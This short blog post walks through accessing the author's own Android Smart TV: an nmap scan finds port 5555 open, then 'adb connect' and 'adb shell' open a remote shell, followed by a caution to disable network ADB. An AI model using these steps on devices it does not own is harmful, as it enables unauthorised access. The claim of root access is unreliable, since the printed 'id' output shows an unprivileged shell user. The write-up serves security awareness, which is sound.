MED Fadel Moumeni
LinkedinNowadays, Smart TVs are in almost every home. Connected to the internet, they’re considered IoT devices, which, like any other IoT device, can be vulnerable to hacking. Today, I’ll show you how I was able to hack my own Smart TV.
After connecting the Smart TV to my hotspot, I conducted an Nmap scan on the network.
user@user ~ % nmap -PR 192.168.1.1/24
Nmap scan report for 192.168.1.7
Host is up (0.023s latency).
Not shown: 999 closed tcp ports (conn-refused)
PORT STATE SERVICE
5555/tcp open freecivPort 5555 immediately caught my attention. In fact, on Android, an open TCP port 5555 usually indicates that the Android Debug Bridge Daemon (ADBD) is listening over the network. Let's verify it using the adb command
user@user ~ % adb connect 192.168.1.7:5555
connected to 192.168.1.7:5555Now, we can easily access the device and obtain root privileges
user@user ~ % adb shell
android:/ $ id
uid=2000(shell) gid=2000(shell) groups=2000(shell),1004(input),1007(log),1
011(adb),1015(sdcard_rw),1028(sdcard_r),3001(net_bt_admin),
3002(net_bt),3003(inet),3006(net_bw_stats),3009(readproc),3011(uhid) context=u:r:shell:s0
android:/ $
As demonstrated above, we successfully gained shell access to the device using ADB over the network. Additionally, we were able to obtain root privileges because the AOSP build is configured in userdebug mode
CAUTION: Many Android TVs have ADB (Android Debug Bridge) enabled by default, listening on port 5555. To enhance security, ensure this feature is disabled in the TV's settings if not needed.